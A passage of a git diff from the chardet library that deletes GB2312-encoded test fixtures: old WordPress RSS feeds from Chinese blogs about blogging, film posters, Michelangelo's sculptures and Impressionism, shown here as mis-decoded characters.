    µ±ָ»ָח¹ִד»¹׃׀²ֳ´¸÷ֳֽזµִµ¼÷½ׁש½,´ף¿ֹׂװ¼׃ׂװ¸¶אµִ׀ֲֶז¸ִװל.µ±°ׁ־ֳַֻׂ¾¿ױ¼¹µִפ׀װ¸³׃טׂ»ײײ׀ֲµִֽ¼׀־¶¨ׂו,ֳִַ´ִדׂ²׀ם¾ֽ¿ֹׂװµֳµ½ֳִָד¾×ֿ²·ח¸סµִµ¼÷½ְ¸.ׂ»ײ±׃׀¹״׳¢ֳ¿¸צ÷ֳױ¾µדµִµ¼÷½ֹט¼ֶ,÷¶א±÷עױג׀©¿´ֶֻׂ³ֳזֹֿ÷׀¡ֳז»‎µִׂ»²¿·ײ,¾ֽֽךָ«ִּוֿײׂ³ֳזֹט¼ֶֹֿµֱִֹ¹גµד³צְ´.ׁׂ¾­ֲ½׀ר׃׀ֻׁ¼¯²»ֽ¬µִױ¾µדµ¼÷½ְ¸£¬»בּפֶהײ׀±ָ½ֿ÷ֳµִ¼¸ײײ½ר׀׀·ֲױױ´מ½¨÷ף½«µֿײ¹‎³ּ׀´µד²ֳ´

    ]]>
    - ׃ֹ׃ִ³¸צ´ם־ף,ֽ»ָ»¾ֽ¸ִ±הֱֻ־ׂׂ»¹ב¶װ׃µ¼÷½ְ¸׃¦µ±¹₪ױµִ¹ִמ.־׀ִ²וֱרµִ־ׂ½«´ם¾ֽ´ם,ֻשׂװ׳מײױ³צְ´µִ¾ִַֽ³ײײ׃¾ץ´ם־»µִµ¼÷½ְ¸,»עױֻµµ±ף±ך»¬¹‎µִ±÷ע,ֳַֻ¾ֽ·ֲ·נװ°¼ֽ¹µִ³ַַ½ײ®¼ה׃כִד׳½ֳװ²״.ֶהµַֽ¦¼עµ¥µִׂ»¸צ׀¡²¼¾ײ¡£

    -

    ´׃´ְֻ©ױ¹³צָ¥£¬ָח¹־ֳַׂ½«ױג¸צ·½·¨׃ֳװױ¾µד׃ַׁיֱ´½׃µִ²¼¾ײ·½½ֳֹֿז£¬ֳִַ´־ֳַׂ¿ֹׂװ׳צ³צׂ»ײײ׃׀±נ׃ׂ»°דµִׂ»¸צ¼עµ¥ֱ´½׃ֱ׀±םµֱִ´½׃»ד¼¯·½½³צְ´£÷½«ֱ´½׃‎ֱ¿³‎ׂװ4£¬µֳµ½µִִַ¸צ‎׳ײ£¨װ±²»¿¼ֲַ׃א‎£©¾ִַֽדֳ¿ׂ»׀׀ֱ´½׃µִ‎ֱ¿£¬ָ»÷ף־ֳַׂ½«ֻש׃׀ױג׀©÷בֿע¡®µ¼÷½ּץ¡¯yֿעׁ׃ֹל£¬·ֵװׂ»¸צdivײ׀£¬ֳִַ´¾ֽ¿ֹׂװ׳מײױ׀־³ֹׂ»¸צ¾״׀־ַר׃עµֱִ´½׃µ״ֽ¼£¬¶ר־ֳַֻׂש׃׀ׂ×׳צµִ¸ִ¶¯½צ½צַװhtmlײ׀±א¼­ֱ´½׃¶רׁׂ£¬css±£³ײװ­ׁש¾ֽok.(ֿךֿ¸ַכ²י¿´¸ֳׂ³ֳזװ´ֲכ)

    -

    µ±ָ»ָח¹ִד»¹׃׀²ֳ´¸÷ֳֽזµִµ¼÷½ׁש½,´ף¿ֹׂװ¼׃ׂװ¸¶אµִ׀ֲֶז¸ִװל.µ±°ׁ־ֳַֻׂ¾¿ױ¼¹µִפ׀װ¸³׃טׂ»ײײ׀ֲµִֽ¼׀־¶¨ׂו,ֳִַ´ִדׂ²׀ם¾ֽ¿ֹׂװµֳµ½ֳִָד¾×ֿ²·ח¸סµִµ¼÷½ְ¸.ׂ»ײ±׃׀¹״׳¢ֳ¿¸צ÷ֳױ¾µדµִµ¼÷½ֹט¼ֶ,÷¶א±÷עױג׀©¿´ֶֻׂ³ֳזֹֿ÷׀¡ֳז»‎µִׂ»²¿·ײ,¾ֽֽךָ«ִּוֿײׂ³ֳזֹט¼ֶֹֿµֱִֹ¹גµד³צְ´.ׁׂ¾­ֲ½׀ר׃׀ֻׁ¼¯²»ֽ¬µִױ¾µדµ¼÷½ְ¸£¬»בּפֶהײ׀±ָ½ֿ÷ֳµִ¼¸ײײ½ר׀׀·ֲױױ´מ½¨÷ף½«µֿײ¹‎³ּ׀´µד²ֳ´

    ]]>
    - http://www.plastiku.com/index.php/176/feed/ -
    -
    -
    \ No newline at end of file diff --git a/chardet/tests/GB2312/lily.blogsome.com.xml b/chardet/tests/GB2312/lily.blogsome.com.xml deleted file mode 100644 index c739305..0000000 --- a/chardet/tests/GB2312/lily.blogsome.com.xml +++ /dev/null @@ -1,272 +0,0 @@ - - - - - - - ־ח÷ף÷ל²ט - http://lily.blogsome.com - Just another WordPress weblog - Mon, 17 Jan 2005 11:42:48 +0000 - http://wordpress.org/?v=1.5.1-alpha - en - - - ׳מ½±ָ½ֳֿ¦ - http://lily.blogsome.com/2005/01/17/iueia/ - http://lily.blogsome.com/2005/01/17/iueia/#comments - Mon, 17 Jan 2005 11:42:48 +0000 - lily - - ־ח÷ףֻז± - http://lily.blogsome.com/2005/01/17/iueia/ - - busy.jpg -

    -]]>
    - http://lily.blogsome.com/2005/01/17/iueia/feed/ - -
    - - ¸ק¹ת¡¶®ֳזֲס·¡·÷£±¨׀ְֹֽ - http://lily.blogsome.com/2005/01/09/ueaaeanudhaei/ - http://lily.blogsome.com/2005/01/09/ueaaeanudhaei/#comments - Sun, 09 Jan 2005 10:41:34 +0000 - lily - - ־ח÷ףױ×ֲ¼ - ־ח÷ףׂױװ· - http://lily.blogsome.com/2005/01/09/ueaaeanudhaei/ - - lovers1.jpg

    -

                                       µֲ¹ת°ז

    -

    lovers2.jpg

    -

                                          ·¨¹ת°ז

    -

    lovers3.jpg

    -

                                        ÷«¹ת°ז

    -

    lovers4.jpg

    -

                                       ְֳ¹ת°ז

    -

    loves5.jpg

    -

                                      ָױ±¾°ז

    -

    lovers6.jpg

    -

                                      ׃¢¹ת°ז

    -]]>
    - http://lily.blogsome.com/2005/01/09/ueaaeanudhaei/feed/ - - - - - - -
    - - ׀ֲִך¿לְײ - http://lily.blogsome.com/2005/01/01/dhaaeiao/ - http://lily.blogsome.com/2005/01/01/dhaaeiao/#comments - Fri, 31 Dec 2004 16:01:33 +0000 - lily - - ־ח÷ףֻז± - http://lily.blogsome.com/2005/01/01/dhaaeiao/ - - ׳£´ף¼ׂװ׀ֲµִׂ»ִך׀ִֿכֲ³ֹ£¬ֽעֲָחׂג£¡ -

    ׳£¹תִµִ°ײ°ײֲטֲט£¬ְֳ¹תµִXXׂ»ַ׀ֻ³ְ£¡

    -]]>
    - http://lily.blogsome.com/2005/01/01/dhaaeiao/feed/ -
    - - ֳ׳¿×ְ»שֲµִײחׂ¹³¿ִ÷ָֻּוµסֿס - http://lily.blogsome.com/2004/12/29/aaeuathuaocoaeeiaunin/ - http://lily.blogsome.com/2004/12/29/aaeuathuaocoaeeiaunin/#comments - Wed, 29 Dec 2004 02:33:24 +0000 - lily - - ־ח÷ףױ×ֲ¼ - ־ח÷ףׂױװ· - http://lily.blogsome.com/2004/12/29/aaeuathuaocoaeeiaunin/ - - ¡¶ײח¡·¡¢¡¶ׂ¹¡·¡¢¡¶³¿¡·¡¢¡¶ִ÷¡·¡×¡× ´ףְם¯µסֿס£¬ֿײ־»׃ׂג´ףְµֲֲִם£¬ֳַ׳¿×ְ»שֲװ¹«װ×1520¡×1534ִך־×ְֳµֶז¼ׂ׳וµֱִךִ¹ֻש׳ק¡£·נֲֲ׳ָר¾ֽ·ְֳµֶז¼ׂ׳וµֱִךִ¹־»׃¥ֲוֲ׳׳פ½ֳּּµִׂ»׳ש׀¡ְס°ֳִּ£¬¶ֿ¶ֿ׀ר׀רµ״ַ°÷ף©¹₪³₪´ן15ִךײ®¾ֳ¡£ֳ׳¿×ְ»שֲ־×ױג׳שֱךִ¹ײֶ׳קֱֻ¼¸׳נײרֳµִµסֿס£¬³ֹ־×ֻ´´׳ק¢ֶ׳מ÷ף½׳¶־µִ׳קֶ·¡£ֶהײ׀׳מײרֳµִַ־»׃ִבִ¦¶¹«¾פײלְֵַׁµ¡₪ְֳµֶזֱךִ¹ַ°µִׂ»¶װִ׀ֵ®ָֻּוµסֿס¡¶ײח¡·׃כ¡¶ׂ¹¡·÷ֽ־¶±ֵָµ¹«¾פֲוֲ׳׳פ¡₪ְֳµֶזֱךִ¹ַ°µִׂ»¶װִ׀ֵ®ָֻּוµסֿס¡¶ִ÷¡·׃כ¡¶³¿¡·£¬ױגַּֽׁ¥׃¹ֵ´ת÷׃ֹסµִִֻ¼‏ֿףױק׀װµס¿ּ¡£

    -

    -

    >_______________1.jpg

    - -

                                                    ¡¶ײח¡· 

    -

     ¡¶ײח¡·ֶֻ÷ץַׂ»¸צ־´ֽך³ֹµִִ׀׀װָֻּוµסֿס£¬ֻ÷ֳֿף¸ױ¸ױ´׃ֻ¯ֳ־ײ׀±»¾×׀ׁ׀ׁ£¬׃ׂײװ±³÷ףײ§³ֵ׳ֵֹםּו£¬ׁ¾¦װ²ױצ׳ֵ£¬ױ‎װ½¹‎׳װ¼÷µִ¼חֽ·ֿעַ°·½ִ‎׃׳ֵ¡£

    -

    _______________2.jpg

    -

                                                   ¡¶ׂ¹¡·

    -

    ¡¶ׂ¹¡·ַׂ»¸צֹם²ִ׃ְֳֵµִֵ®׀װ£¬µ«ֹםּוµִ¼¡ָגֹֻ³¶ר־ֱ¦£¬ֻ‎׃ׂײ±§׳ֵֽ·£¬ױ‎װֹמֹמµ״³ֱֻ¯׳ֵ£¬½ֲֵֿµֳִ¨ֽ·׃¥ֿףױק׳ֵ÷ׂ¹µִ½µֱ£¬ױם÷ףµֳִז¾װעֿףױק׳ֵ¶סֳ־²רֹם£¬ֻ‎ֶֻ÷ץׁׂ¾­¾«ֶ£ֱ¦¾¡£¬ײ»׃׀װֳ־¾³ײ׀²ִֵµֳµ½°²ִ‏¡£

    -

    _______________3.jpg

    -

                                                     ¡¶³¿¡·

    -

    ¡¶³¿¡·µִ׀־ֿףַ´¦ֵ®µִ»¯ֹם£¬ֻ‎·בֲת¶ר½בµ£¬ָ«ֹם»ְ·¢³צַא´÷µִ»מֱ¦÷ֽ¹ג»װ£¬ֶֻ÷ץױ‎´׃»טֻ¯ײ׀ױץװת׳ֵֻױ׀ׁ¹‎ְ´£¬µ«ֳ»׃׀»¶ְײ£¬ײ»׃׀ֹםּו÷ֽ¾«ֹסֹֿµִֽ´¿א¡£

    -

    _______________4.jpg

    -

                                                    ¡¶ִ÷¡·

    -

    ¡¶ִ÷¡·±»±םֿײ³ֹ־×ׂ»¸צַ¿׳³µִײ׀ִךִ׀׳׃£¬ֹֻֻ³µִ¼¡ָג־ֱ¦µ״ֲֿ´¹׳ֵ£¬ֱִֹֻֿך¼ֽµֱִ³ֹֿ³ֱ½‏װֶ½¾²µִ·´׀ׁײ׀£¬»ע׀םַ׃ֹ׃¿אֳֶ¶רװ·¢´פ¡£

    -

    ױגִֻ¸צָֻ־ן׀־ֿף¶¼±»¸³׃טֱֻּ״גµִװ¢ׂג£¬¾׃׀ַ¿ֱׂµִ²»־ָ¶¨¸׀£¬ֳַֻױ·׳×·´²א£¬ֶֻ÷ץַ־×ְֲֻשֵָ£¬ֿװµֳ׃ַ׀ִגחגח£¬¼ָֿףױק׳ֵ¹גׂץµֱִקֵ£¬ׂ²´ת±ם׳ֵ±³½ײ§ֵהµִֹת׃כְֻµֳִװֻ¡£

    -

    ְֳµֶז¼ׂ׳וֱךִ¹÷ֶֽהµסֻ׳קֶ·ַ¼ִֽמ±®½µִ½׳ק£¬ֽ¬±ׂ²ֳַ׳¿×ְ»שֲׂױץֹתִׁײ׀ײ״ׂ×µִ׳×ױµד¡£׃ֶָהַױגִֻ¼‏µסֿסֻש±ם´ן³צµִ²»°²¡¢½פױֵׂװ¼°´ר׃׀׀ֱֻבµִַ´׃£¬ױ‎ַ׳קױ׀ֱִיֹמ´¦ױזµ׀´ױױ¡£ֳ׳¿×ְ»שֲֳז¶װ´¦׃¶¯µ´ײ®ײ׀µִׂג´ףְֿײµֹח»ב£¬ָֻ־ִײקׂוµְִםֿכֳֶֶנֱֻ£¬ֻµִֻ¼ֿכ¿×¼±הµֳֹמ³ֱ÷ֽ¿אֳֶ£¬׳קֶ·ײ׀ֱפֲֿµִײ»׃׀¶װ׳ז¹תֳװֻµִµ£׃ַ÷ֽ¶װְָֻאְֳ÷ֳ־´ְ´µִ¸׀ֹֻ¡£ױג׀©µסֻ׳קֶ·±ם¾ׂג´ףְ־ִׂױ¸´׀ֻµִ»ֶ½נ±´תׁׂ¾­¹‎ָ¥ֱֻ£¬²¢³ֹ־×÷ףְ´¡°ׁש½ײקׂו¡±ְֳץ׳קֶ·µִַָֿ‎¡£

    -]]>
    - http://lily.blogsome.com/2004/12/29/aaeuathuaocoaeeiaunin/feed/ - - - - -
    - - ¹״׃׃¡ֿףײקׂו - http://lily.blogsome.com/2004/12/29/oouoioooa/ - http://lily.blogsome.com/2004/12/29/oouoioooa/#comments - Tue, 28 Dec 2004 06:28:12 +0000 - lily - - ־ח÷ףױ×ֲ¼ - ־ח÷ףׂױװ· - http://lily.blogsome.com/2004/12/29/oouoioooa/ - -  ֵ·ײׂױץ´׃´«ֽ³׀־ּ¬ֿעֿײ´ת׀־ּ¬µִ¹‎¶ֹ£¬¾­ְתֱֻ׃¡ֿףײקׂו¡¢׀ֲ׃¡ֿףײקׂו¡¢÷ף׃¡ֿףײקׂו÷ֽֿףױקײקׂוµָ½׳¶־¡£ֻהָ»װ19ְ¼ָֽֿ÷ף³צֿײ¹‎¹ֵµהײקׂו¡¢ְֲֻ‏ײקׂו÷ֽֿײµײקׂוµִ³±ֱק÷ֽ·ח¸ס£¬ֳַֻׂ²¶¼¾׃׀²»¿ֹ·סָֿµִ¸ן׀ֲׂגׂו£¬µ«׳װ׃¡ֿףײקׂו¾ףֶנ£¬ֵ·ײׂױץµִֿײ´ת·ח²ֹ·½¼¶ִֻ¡£´׃ױג±ֶֶנ£¬ׂױץ´׃ִָµ½׀־½µִ±ה¸ן£¬ּרװ¾µִ·ש¶ָװ½ְ´װ½´ף£¬¸ן׀ֲµִ·זֳ¢װ½ְ´װ½ֳֿק£¬´׃¶רװ׀׃‎ֱֻ20ְ¼ֽ³ץ¶װ´«ֽ³ׂױץµִָ«ֳזֽ»ֶֶ£¬³צֿײױ¸׀ֲµֳִזֳ²£¬µ«ׂ²ֽ¬±װ׀׃‎׳ֵ׀ֲµִ־£»ת¡£ -


     19ְ¼ֽ׳מ÷ף30ִךµִֵ·ײ£¬¾­¼ֳ»סµֳֿװײרµִװצ³₪¡£׃ֹ׃װ¹₪ׂµ÷ֵֽ©ׂµײ׀װֻ׃ֳ׀ֲµִ¿ֶׁ§÷ֽ¼¼ץ£¬ֹת²תֱ¦װַ°ֻש־´׃׀µִ¹זִ£ֹֿ»סµֳ·¢ױ¹ ¡£µ«װ־ןײ²תֱ¿װצ³₪µִֽ¬±£¬ױגׂ»±ֶµִ¼¸ס¡¢ְָף÷ֽֽ¶׳ױׂזָ´ֶױ±יֲֿ½µ¡£׃ֹ´ֻװ¾­¼ֳֹת»מײ׀׃ײ³צֿײֱֻֿפּץµִ¾°ֿף¡£·±ָ¡¢·¢ױ¹׃כֿפּץֿײֿףֳ¬¶¶רֽ³ׂ»µ״¹²´ז¡£װֹח»בױ‏ײ־ֻ¼ֿכ·½ֳז£¬׃ֹ׃¿¨¶¡₪ֲם¿ֻֻ¼µִ¾ײר< ׳±¾ֲ>(1867)¡¢²י¶ֻ¹¡₪´ן¶־ִµִ< ְָֻאֶנװ´>(1871 )¡¢¿ְֻ­¿ֻ¡₪ֲף¿ֻֻ¹־₪µִ< µחׁ§÷ֽ´ֵׁ§ֲ>(1873)÷ֽ¸¥ְןµְֲןֿ£¡₪ִב²ֹµִ< ±¯¾חµִµ®ֹת>(1872)µִ־ְ£¬׃ֶָהֲַם¿ֻֻ¼µְִת·־¨־ןײקׂו÷ֽ±חײ₪־¨־ןײקׂוֻ¼ֿכ׃כ´ן¶־ִ½ר»¯ֲµִ´«²¥£¬װײ×¶½חׂ‎ֶנ¹ד·÷¶רֹמ¿ּµִֻ¼ֿכ¶¯µ´¡£װ¿ֶׁ§ֻ¼ֿכְ©´ף׃°ֿלµִֽ¬±£¬־¨׀ִײקׂו¡¢»ש¶½½ֹּסׁ§ׂ²ֿאµ±»מװ¾¡£»ת׀µֲ׃°ֿלµִ¹¦ְײקׂו÷ֽµײ₪ײקׂוׂ²׃׀׳װ¼÷µִ׀³¡¡£װױגׁשµִ±³¾°ֲֿ²תֹתµִ־ִׁ§ׂױץ²»¿ֹ±ֳגµ״¾׃׀ֻ«ײ״׀װ£÷׃כ´«ֽ³·ח¸סֿאֱ×ֿµµִׂ»ֳז÷ֽ׳·ַף±ך׀ֱֲ¢ׂל¸ן׀ֲµִׂ»ֳז¡£װ־ִׁ§ײ׀³צֿײֱֻ¡°׳װָ»ײקׂו¡±µִֻ¼³±÷ִֽ³׀©¡°ַֽ·ֿ¡±µִ¼£ֿף¡£׳װָ»ײקׂוµִ׳ק¼ׂײקױֵׂװ¾¾«»בֹס÷ֽ¾«ײֲֳֿׁµִ¿ֽ¹ּ¬¶ָ£¬ֹדָ¡ֲ־ןµִױזֳזִ¿¡£׳װָ»ײקׂוµִ´ת±םָֻ־ן־×·¨¹תµִ׳ףְ­¡¢¸£ֲ¥°¡¢¹¨¹ֵ¶׀ײµ¡£ֻש־½ַֽ·ֿ¼£ֿף£¬ַײ¸־ִׂױ¸´׀ֻׂװְ´־ִׂױ´«ֽ³µִַֽ°÷ֳֽ»ֲה¡£־ִׂױ¸´׀ֻׂװְ´ָ·ֱ¢µִ¹״׃־ִׂױ׳קֶ·µִ»ש±¾·ח¸סׂװ¼°׃ֳׂױץµִֿכֿףְ´ױזµµ״·´׃³׳װָ»µִ׀ִֵמ£¬µ½·ס¶¨÷ֽײֹׂ¡£ױג¸רׂױץ´´׳ק´רְ´ֱֻ׳װ׃ֹ£¬µ«ֽ¬±ׂ²´רְ´ֱֻֻנ§£¬־ִׂױ´´׳ק׃ֹ´ֹֻ¥§ֱֻ¶װָֻµִױזױ‎׀־ֿףµְִם׀װ¿ֿ¶¨¡£׃¡ֿףײקׂו¡¢׀ֲ׃¡ֿףײקׂו¡¢÷ף׃¡ֿףײקׂו¡¢ֿףױקײקׂוµָ¾ַֽױגׁשׂ»׀©׃׀ֻ«ײ״׀װµִׂױץֻ¼³±÷ֱֽקֵֹ¡£ֳַֻ´׃²»ֽ¬µִ·½ֳזׂװ׀ֲµִ׃½ַױזµµ״¡¢¿ֶׁ§µ״ֳט»ז¿ֽ¹ְ½ח(°ְ¨¹ג÷ֽ¿ױֶר·ױ־§)£¬ֳט»זׂױץ¼ֹׂם±µִֿײµ£¬±ם´ן׳װ¼÷µִ¸׀׀װ÷ְֽם׀װָֿ¶¡£µ±ָ»װױג׀©׀ֲµִ³±ֱקײ׀£¬ׂ²²»¿ֹ±ֳגµ״»ב׃׀¡°ַֽ·ֿ¡±µִ³ֹ·ײ¡×¡×װ´´׳קײ׀ֹבֶת³ח¸µְִםֿכ¡£µ«ֽ¬±ֳַֻµִ¸ן׀ֲׂגׂוׂ²²»ָ÷צ׃¡£ֳַֻ¿×±ֱֻ»ז»­׃ןׁװµִ׀ֲּלµ״£¬ֳַֻ׃ֳ׀ֲµִ¼¼ַֹױ¹¾ֱֻ¿ֽ¹ְ½ח÷ֳַָֻֽײק¹¾«ֹסְ½חµִ·ב¸»׀װ£¬ֳַֻֽ״ױ¹ֱֳַָֻֻµִֹףְֱֳל׃ע£¬ֳַֻ־×ׂױץ¼ׂ·¢»׃¸צ׀װּב¹©ֱֻ׀ֲµִ¿ִֹ¡£ױג׀©׀ֲֻ¼³±÷ֽ׀ֱֲקֵֹ±¾ֹםַׂױץֱל׃עײ׀µִ¸ןֳ£¬ֳַֻֽ¬±ׂ²װ׀׃‎ֱֻ20ְ¼ֽׂױץ¸־×¼₪ֱׂµִ¡¢ִׁׂװ׳װ־ׂ¿״ײֶµִ±ה¸ן¡£

    -

     ׃¡ֿףײקׂו(impression,l9n)װ19ְ¼ֽ60ׂ»70ִך´תׂװ´´׀ֲµִ׳ֻּ¬µַֹֿ·¨¹ת»­ּ³£¬ֶה·זֳ¢ַ·´¶װ³ֲ³ֲֿאׂעµִ¹ֵµה»­ֵֹ÷ֽ³ֱֳוװײ׀ְ¼ֶֽן¿־ִׁ§¶רָֿכ½ֳָאװל׳קµְֲִֻ‏ײקׂו¡£׃¡ֿףײקׂו־ױֱֻ¿ֲֲ¡¢°ֽ±ָֹֻ»­ֵֹׂװ¼°¿ג¶±´׀´µײקׂוµִ׃×ׁר£¬װ19ְ¼ֽֿײ´ת¿ֶׁ§¼¼ץ(׃ֶָהַ¹גׁ§ְםֲ÷ֽµ¼ש)µִֶפ·¢ֲֿ£¬׳¢ײ״װ»ז»­ײ׀¶װֽג¹גµִׁ׀¾¿÷ֽ±םֿײ¡£׃¡ֿףײקׂו»­¼ּׂב³«»§ֽג׀´ֹת£¬ײ±½׃ֳט»זװׁפ¹גֲֿµִ־ןֿף£¬´׃¶ר¾ֶתֱֻ´׃16ְ¼ֽׂװְ´±ה»¯ֹץ־¢µִ÷ײֹ«µק׳׃£¬²¢¸ש¾»­¼ׂ׳װ¼÷ׁ¾¦µִ¹²ל÷ֽײ±½׃¸׀£¬±םֿײ־¢ֳמµִֹ«²±ה»¯¡£װױג·½ֳז׃¡ֿףײקׂו»­¼ׂ»¹´׃÷ְֹ¼׀¡»­ֵֹ¡¢־ק°אְׁ»­¼ׂ־¯ְ­ֻ¹¹ףײ§¡¢׃¢¹ת»­¼ּׂ״ִֹ÷ֽ¿µֻ¹ּ«²×¶µְִַָָֻן½׃ֱֻ׃׀ׂזµִ¾­ׁי¡£´׃׃¡ֿףײקׂו¿×¼£¬ֵ·ײµִ»­¼ֳַׂװֽ¼¹»ז»­°ֽׁ־ִׁ§µִ׃°ֿל£¬ְפ¶אµ״׳¢ׂג»ז»­׃ןׁװ±¾ֹם¡£װ׃¡ֿףײקׂוִ²¿´זװ׳ֱֵ½ײײְא׀ֽµִ»­¼ָׂ÷¡£ׂ»ַׂװµֲ¼׃־×´ת±ם,ׂ»ַׂװִ×ִ־־×´ת±ם¡£µ±ָ»ׂ²׃׀µִ»­¼ׂ½י׃ֱ½ײײְא׀ֽײ®¼ה¡£װחװ60ִך´ת£¬ׂ»ָ÷׃׀ּ½ֻק÷ֽ´´׀ֲ¾«ֹסµִַאִךָֻ£¬¶װ±£״µִ¹·½ֹ³ֱתׁ¹ײֶַאִךµִ´´װל¾«ֹסֹמ¸׀²»ֲת£¬ֳַֻׂװ¿ג¶±´µ±ִך·´¶װ¹·½ׂױץµִ¶·ױש¾«ֹס־×°סׁש£¬ֵֽ½בװµ½¹·½ֹ³ֱתְהµ­÷ֲֽעֲהµִ¡¢¸»׃׀ּ½׀ֲ׃ֲֶרµֲִםִ־µִײ־§£¬׀־³ֹׂ»¸צ׃כ¹·½ֹ³ֱתֿא¶װֱ¢µִ¼¯ֵֽ¡£ױג׀©»­¼ׂ²»¶¨ֶµ״װ°ְֽטµִ¸ַ¶²¨ֽ²ֽ¹÷ֽ׀ֲֵׁµה²ֽ¹£¬ׂװ¼°װ°ֶֽכׂ®׃כְ׳ֵµ°¢µִ¹²ֽ¬»­ׂ»ב־מ£¬²¢µ½ִָֹ÷׃ֵֿײ±½׃¶װ¾°׀´ֹת¡£¾­³£²־¼׃¾»בµִ»­¼ׂ׃׀ִ×ִ־¡¢ְ׳ֵµ°¢¡¢±ֹֿ³ֲ¡¢°ֶֽכׂ®¡¢ָֹ׀µָ£¬ְֲֶ¼ׂ׃׀¶ֵָנ÷ְֽ־¬ְ­£¬׳ײתױג¸צ¾»בµִ׃׀»­ֹּ¶ְֵׂ»ֲ³ׂ®¡£¡¡¡¡¡¡¡¡ ¡¡¡¡ 1874ִך4װֲ£¬ױגָ÷ַאִך»­¼ׂװ°ְֽט¿¨ֶױ׀ֱ´ף½ײ½ט׃ֳֹד׃°¦ִַ´ן¶(Na¡×dar)µִ¹₪׳קׂ¾°לױ¹ְְ£¬ֳַֻ׳װ³ֶ־ס°־ֳµִ»­¼ׂ¡¢µסֻ¼ׂ÷ֽ°ז»­¼ׂ׀­»ב¡±¡£²־¼׃ױ¹³צµִ׃׀ִ×ִ־¡¢ְ׳ֵµ°¢¡¢±ֹֿ³ֲ¡¢־קֻ¹ְ³¡¢µֲ¼׃¡¢ָֹ׀¡¢ִ×ְןֻק¡¢»שװ¼ֲµָָֻ¡£װױ¹ֶ·ײ׀ִ×ִ־µִ׃ֽ»­< ׃¡ֿף¡₪ָױ³צ>µִ±ךּג±»ׂ»־»±£״µִ¼ַױֲ·ׂ׳¡₪ְױֲ³ֽװ־ִױֲײ׀½ט׃ֳ׳ק־׳°·ם£¬³ֶױג´־ױ¹ְְַ¡°׃¡ֿףײקׂו»­¼ׂµִױ¹ְְ»ב¡±£¬¡°׃¡ֿףײקׂו¡±׃ֹ´ֻ¶רµֳֳ¡£׃¡ֿףײקׂו»­ױ¹´׃1874ִךµ½1886ִך¹²¾׀׀ֱֻ8´־¡£·ײ±נװ1874¡¢1876¡¢1877¡¢1879¡¢1880¡¢1881¡¢1882÷ֽ1886ִך¡£³‎ֱֻµׂ»¡¢µִֻ÷ֽµ°ֻ´־ֽג£¬¾ש¹׃ֳ¡°׃¡ֿףײקׂו¡±ׂ»´׳ק־×ױ¹ְְֳ³ֶ¡£¡¡¡¡׃¡ֿףײקׂוַׂ»¸צֹֹֻ¢µִׂױץֹחֵֽ¡£ױג¸צֹחֳֵֽ»׃׀ֳקָ·µִ¸ֱל¡£ׂױץ¼ׂ¼¯÷ֿװׂ»ֶנ£¬½צ½צׂע־×»­·ח±ָ½ֿׂ»ײֲ£¬±ד׃¹²ֽ¬¾°לױ¹ְְ¡£²־׃כױ¹³צµִׂױץ¼ׂ£¬׃׀µִ½צװׂ»¶־±¼הֳִװֱµ׃׃¡ֿףײקׂו»­·ח£¬÷ףְ´װעֱם׃׀׳·ַף£»׃׀µִװ»ז»­·ח¸סֹֿװר¶א´־±ה»¯·´¸´¡£´ֻֽג£¬²־׃כ»­¼ׂµִֻ®ֶ½ׂ²²»¾¡ׂ»ײֲ¡£»ז»­ײ׀µִ׃¡ֿףײקׂוַ÷ֽ·¨¹ת־ִׁ§ײ׀µִ׳װָ»ײקׂוֱקֵֹֿא¶װ׃¦µִ¡£׃¡ֿףײקׂו÷ֽ׳װָ»ײקׂו¶¼װרµ½ױׁ§ֹֿµײ₪ײקׂוµִ׃°ֿל¡£

    -

    impression.jpg

    -

         ָױ³צ¡₪׃¡ֿף£¨Impression, soleil levant£¬
         Claude MONET 1873Mus¨¦e Marmottan, Paris£©

    -]]>
    - http://lily.blogsome.com/2004/12/29/oouoioooa/feed/ - -
    - - ¹״׃»¯׳±ֶ·µִ׀ִµֳ - http://lily.blogsome.com/2004/12/29/oouaeuadhaua/ - http://lily.blogsome.com/2004/12/29/oouaeuadhaua/#comments - Tue, 28 Dec 2004 05:34:38 +0000 - lily - - ֵ®ָֹֻת»מ - http://lily.blogsome.com/2004/12/29/oouaeuadhaua/ - - ׳ק־×ֵ®÷¢׳׃£¬¼¸÷ץ¶¼»בװµ±µִ³¡÷ֿײ׀»¯׀©µ­׳±¡£ֲֳֿז£¬־ֿׂכׂװ»₪·פ£¬»¯׳±µִֻ³׀ע£¬ּ¸ׂ»ֲֿ־ׂ¶װׂ»׀©»¯׳±ֶ·µִ׀ִµֳ÷ּֽו»ב¡£¡´׳¢£÷±¾־ִײ»װ־ׂ¹׃ֳ¹‎µִ»¯׳±ֶ··¶־§ִ½ר׀׀׳½ב÷ּֽײֲ£¬²»ֹז¼°¶װָ־÷־ׂ»ײײ»¯׳±ֶ·½ר׀׀¹ד¸ז׀´«÷ֹּֽׂµ®»¡µ¡£ ±¾ָֻפ׃ײ׀׀װT׀ֽ»ל÷ֿ׀װֶ₪·פ£¬װ¶מַ°÷ֽ±ַ׳׃´¦׃׀׃ֽײ¬·ײֳ£¬ֱ½¼ױ³¸ֹ׀װ׳´¡£ 1. װ»¯׳±ײ®ַ°£¬ַוְםֶ₪·פַµׂ»־»µִ¡£־ׂ¹׃ֳ¹‎÷¶אֵֶ׳׃µִֿ´ֳזִּ£¬µ«װֶהײ׀£¬ֳ»׃׀¸׀¾ץּ״±נ÷ֳ£¬°®²»ֽײµִֵֶ׳׃¡£¾ִֽ¿ַ°¶רׁװ£¬־ׂױ‎װ¹׃ֳ׳ֹתֳּµִֿ´ֳזִּ£¬ׂע־×ֳ»׃׀ּ״±נ²»µִ¸׀¾ץ£¬ֻשׂװ£¬ְ´ָױ±¾3ִך־ׂׂ»ײ±׃ֳֻ¡£ֱםֽג£¬»״¹תµִ±÷ע£¬¸רְֿ°ײֶֽ¼צ¹׃ֱֳֻױגײײֿ´ֳזִּ£¬ֳ»ֿכµ½ְֿ°ײ·ַ³£ֿ²»¶£¬ׂע´ֻ£¬ֳ¿´־»״¹ת¶¼¸רְֿ°ײ´רױג¸צֵֶ׳׃µִֿ´ֳזִּ¡£µ«ַ£¬װװר¾­¹׃ֳ¹‎µִֵֶ׳׃ײ׀£¬¶װֶהײ׀ׂ»¸צֵֶ׳׃µִ¸׀¾ץ¼ַׂה׃ּ׀ֲ£¬ִַ¾ַֽ÷ֳֿסװ1995ִך׃ֹ־ג»ֱ«׳ק¹‎¹ד¸זµִ—–¡°ַו׀ֲֻ¬½²»½פ±ֱ¡±µִִַ¿מֿ´ֳזִּ¡£ׂע־×ֻׂװ¡°²»½פ±ֱ¡±־×ּ״ֹ«£¬ֻשׂװ£